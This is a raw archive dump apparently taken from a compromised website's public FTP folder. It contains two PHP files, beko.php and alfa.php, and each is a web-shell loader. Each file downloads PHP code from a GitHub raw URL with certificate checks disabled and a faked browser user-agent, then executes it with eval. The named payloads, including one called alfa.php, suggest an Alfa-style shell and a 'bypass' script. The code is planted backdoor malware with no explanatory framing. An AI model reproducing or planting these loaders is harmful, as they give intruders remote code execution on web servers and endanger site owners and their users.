/home/fresvfqn/crimescenecleaningupsuffolkcounty.com/public_ftp.tar
bajk/index.php000064400000000001151005446160007264 0ustar00 bajk/beko.php000064400000001062151005446160007105 0ustar00<?php
function getRemotePHP($url) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        CURLOPT_SSL_VERIFYPEER => false,
    ]);

    $code = curl_exec($ch);
    curl_close($ch);

    if (!$code) {
        die('Gagal ambil file dari URL Cok :(.');
    }

    eval("?>$code");
}

getRemotePHP('https://raw.githubusercontent.com/wawanbangke/ggo/refs/heads/main/bypass.php');
?>bajk/alfa.php000064400000001066151005446160007074 0ustar00<?php
function getRemotePHP($url) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        CURLOPT_SSL_VERIFYPEER => false,
    ]);

    $code = curl_exec($ch);
    curl_close($ch);

    if (!$code) {
        die('Gagal ambil file dari URL Cok :(.');
    }

    eval("?>$code");
}

getRemotePHP('https://raw.githubusercontent.com/hadiArsa123/marijuana/refs/heads/main/alfa.php');
?>